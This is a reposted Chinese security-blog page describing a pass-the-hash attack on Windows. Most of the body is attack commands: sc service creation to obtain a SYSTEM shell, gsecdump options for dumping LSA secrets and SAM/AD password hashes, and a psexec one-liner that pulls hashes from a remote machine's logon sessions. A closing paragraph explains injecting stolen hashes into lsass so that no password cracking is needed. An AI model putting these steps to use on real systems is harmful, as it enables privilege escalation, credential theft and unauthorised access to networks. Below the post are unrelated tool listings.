`
blogfeifei
  • 浏览: 1217857 次
文章分类
社区版块
存档分类
最新评论

HASH注入式攻击

 
阅读更多

文章作者:pt007[at]vip.sina.com

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

下载网址:

http://www.truesec.com/PublicSto ... tectCookieSupport=1



To get a DOS Prompt as NT system:



C:/>sc create shellcmdline binpath= "C:/WINDOWS/system32/cmd.exe /K start" type= own type= interact

[SC] CreateService SUCCESS



C:/>sc start shellcmdline

[SC] StartService FAILED 1053:



The service did not respond to the start or control request in a timely fashion.



C:/>sc delete shellcmdline

[SC] DeleteService SUCCESS



------------



Then in the new DOS window:



Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.



C:/WINDOWS/system32>whoami

NT AUTHORITY/SYSTEM



C:/WINDOWS/system32>gsecdump -h

gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)

usage: gsecdump [options]



options:

-h [ --help ] show help

-a [ --dump_all ] dump all secrets

-l [ --dump_lsa ] dump lsa secrets

-w [ --dump_wireless ] dump microsoft wireless connections

-u [ --dump_usedhashes ] dump hashes from active logon sessions

-s [ --dump_hashes ] dump hashes from SAM/AD



Although I like to use:



PsExec v1.83 - Execute processes remotely

Copyright (C) 2001-2007 Mark Russinovich

Sysinternals - www.sysinternals.com



C:/>psexec //COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT



to get the hashes from active logon sessions of a remote system.



These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.



提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.

原文出处:http://truesecurity.se/blogs/mur ... -text-password.aspx

分享到:
| 域环境下的渗透
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

    msvctl_0.3.zip

    我自已所架的模拟环境中测试过,在满足上面三个条情的情况下面才能够进行HASH注入攻击。 如果我们仅仅的是拥有一个以system权限值行的mssql进行内网渗透的话,完全没办法利用hash攻击;或者是我们用windows RPC溢出...

    Paros proxy

    Paros proxy是一个对Web 应用程序的web漏洞评估的代理程序,即...它包括一个Web 通信记录程序,Web 圈套程序(spider),hash 计算器,还有一个可以测试常见的Web 应用程序攻击(如SQL注入式攻击和跨站脚本攻击)的扫描器。

    Paros+Proxy

    spider hash 计算器 还有一个可以测试常见的Web应用程序攻击 如SQL注入式攻击和跨站脚本攻击 的扫描器 ">安全测试工具 一个对Web应用程序的漏洞进行评估的代理程序 即一个基于Java的web代理程序 可以评估Web应用程序...

    WEB安全测试工具

    知识点:Paros proxy包括一个Web通信记录程序,Web圈套程序(spider),hash计算器,还有一个可以测试常见的Web应用程序攻击(如SQL注入式攻击和跨站脚本攻击)的扫描器。 3. WebScarab:WebScarab可以分析使用HTTP...

    jQuery Mobile漏洞会有跨站脚本攻击风险

    当jQuery Mobile检测到一个类似URL的`location.hash`时,它会尝试用XMLHttpRequest进行请求,并使用innerHTML处理响应,这为XSS注入提供了可能。 攻击过程大致如下: 1. 检查`location.hash`属性。 2. 如果`...

    2020年网安省赛理论题目.doc

    7. Hash函数特性:Hash函数通常能接受任意长度的输入并生成固定长度的输出,题目中提到的输入长度是任意长度。 8. 端口扫描技术:半开式扫描不同于常规的端口扫描,因为它不完成TCP三次握手的全过程,这使得其更具...

    互联网系统在线安全监测技术设计方案(标书).doc

    1.1.2.4 敏感内容及防篡改监测运用远程Hash技术,实时监控重要页面的完整性和敏感内容,及时发出篡改警报。 1.1.2.5 安全漏洞监测着重于Web应用的SQL注入和XSS跨站脚本漏洞。对于SQL注入,通过多字段测试、动态参数...

    PHP安全基础

    SQL注入是攻击者通过操纵SQL查询来获取未经授权的数据或执行恶意操作的一种方式。使用预处理语句和参数化查询可以有效地防止SQL注入。PDO(PHP Data Objects)扩展提供了这样的功能。 ```php $stmt = $pdo->prepare...

    php检测 Phpmyadmin提权漏洞演示

    5. **PHP安全函数**:如`escapeshellarg()`和`escapeshellcmd()`用于命令行安全,`htmlspecialchars()`用于防止XSS攻击,`password_hash()`和`password_verify()`处理密码安全等。 6. **Apache和Nginx配置**:了解...

    php+mysql网站开发项目式教程

    -预处理语句:使用预处理语句防止SQL注入攻击,提高代码安全性。 3. PHP与MySQL的集成: - 数据库操作:通过PHP与MySQL交互,执行查询,获取结果集,并在网页上展示数据。 -事务处理:学习如何使用BEGIN,COMMIT...

    无线传感器网络中基于邻居信息和单向哈希链的过滤方案

    作者刘志雄和刘华夫提出了一种新的过滤方案NHFS(Neighbor information and one-way Hash chain-based Filtering Scheme),旨在解决WSN中面临的特定攻击问题——协作式假报告注入攻击(collaborative false report ...

    基于php的校园二手信息网站的设计与开发

    【安全性】:网站应具备防止SQL注入、XSS攻击的安全措施,使用预处理语句或参数化查询防止SQL注入,对用户输入进行过滤和转义处理以防范XSS攻击。 【响应式设计】:考虑到用户可能使用不同设备访问,网站应采用响应...

    php比较完美的注册登录系统

    10. **用户界面**:创建响应式的前端界面,确保在不同设备上都能良好显示。可以使用HTML、CSS和JavaScript,或者使用Bootstrap等前端框架。 11. **防止CSRF攻击**:添加CSRF(跨站请求伪造)令牌,确保只有合法的...

    第九节 微服务安全(上)1

    - **集中式Session(解决方案二)**:另一种方法是采用集中式的session存储,如Redis或Memcached,所有服务都向这个中心节点查询或更新session信息。示例代码展示了如何使用Cookie来实现这一过程,包括读取、写入和...

    第七章PHP动态网站开发——实例.zip

    理解如何使用预处理语句防止SQL注入攻击也是重要的安全实践。 3. **表单处理**:动态网站通常需要用户输入,因此表单处理是关键。PHP可以接收表单数据,进行验证(如邮箱格式、手机号码格式),并根据验证结果决定...

    基于PHP的博客系统Simple-Log源码.zip

    预处理语句和PDO(PHP Data Objects)扩展的使用可以确保数据安全,防止SQL注入攻击。 3. **用户认证与权限管理** 博客系统通常需要用户登录功能,涉及用户注册、身份验证和权限控制。这可能涉及到session或cookie...

    用户注册及验证代码(连接数据库)

    除了密码加密,还需防止SQL注入攻击,通过预编译语句或参数化查询来确保输入数据的安全。另外,使用HTTPS协议可以保护用户在传输数据时免受中间人攻击。 最后,**错误处理和日志记录**对于调试和维护至关重要。当...

    PHP实例开发源码-虾逍话站源码 php版.zip

    10. **安全实践**:源码中应遵循最佳安全实践,如防止SQL注入、XSS攻击、CSRF(跨站请求伪造)等,确保用户数据的安全。 通过分析和学习虾逍话站的源码,开发者可以加深对PHP语言的理解,掌握Web开发的基本流程,并...

    基于PHP的采集网-英文论坛源码.zip

    因此,开发者需要熟练运用PHP的表单处理和验证技术,防止SQL注入和跨站脚本攻击(XSS)。同时,为了保证用户数据的安全,会使用PHP的加密函数,如password_hash()进行密码哈希存储,以及session和cookie管理用户会话...

    php+社区系统后端代码.zip

    5. 安全防护:防止SQL注入、XSS攻击等是后端开发的重要任务。PHP提供预处理语句(如PDO预处理)来防御SQL注入,过滤和转义用户输入则可避免XSS攻击。 6. 错误处理与日志记录:良好的错误处理和日志记录能帮助开发者...

Magicbox
Global site tag (gtag.js) - Google Analytics